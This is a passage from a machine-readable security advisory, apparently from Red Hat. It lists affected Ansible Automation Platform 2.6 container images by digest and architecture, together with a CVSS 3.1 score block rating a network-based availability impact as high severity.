"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
